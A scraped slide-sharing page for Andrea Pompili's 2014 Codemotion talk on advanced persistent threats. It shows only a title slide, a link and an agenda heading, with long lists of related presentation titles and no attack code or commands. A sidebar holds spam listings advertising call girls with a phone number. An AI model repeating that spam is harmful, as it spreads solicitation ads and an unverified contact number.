Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
 
Rust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with EmbassyRust Embedded Development on ESP32 and basics of Async with Embassy
Rust Embedded Development on ESP32 and basics of Async with Embassy
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
 
I Want These * Bugs Off My * Internet
I Want These * Bugs Off My * InternetI Want These * Bugs Off My * Internet
I Want These * Bugs Off My * Internet
 
P fsense
P fsenseP fsense
P fsense
 
Media Source Extensions
Media Source ExtensionsMedia Source Extensions
Media Source Extensions
 
Rapport DVWA: File Upload
Rapport DVWA: File UploadRapport DVWA: File Upload
Rapport DVWA: File Upload
 

Similar a The magic world of APT 0.6 - Pompili

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliCodemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the massesCodemotion
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolersVMware Tanzu
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014Tony Parisi
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationDamien Dallimore
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsVMware Tanzu
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 

Similar a The magic world of APT 0.6 - Pompili (20)

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea Pompili
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the masses
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolers
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
Ignite java-robots
Ignite java-robotsIgnite java-robots
Ignite java-robots
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk Presentation
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 

Más de Codemotion

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserCodemotion
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Codemotion
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Codemotion
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Codemotion
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Codemotion
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Más de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Último

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Último (20)

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

The magic world of APT 0.6 - Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
  • 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
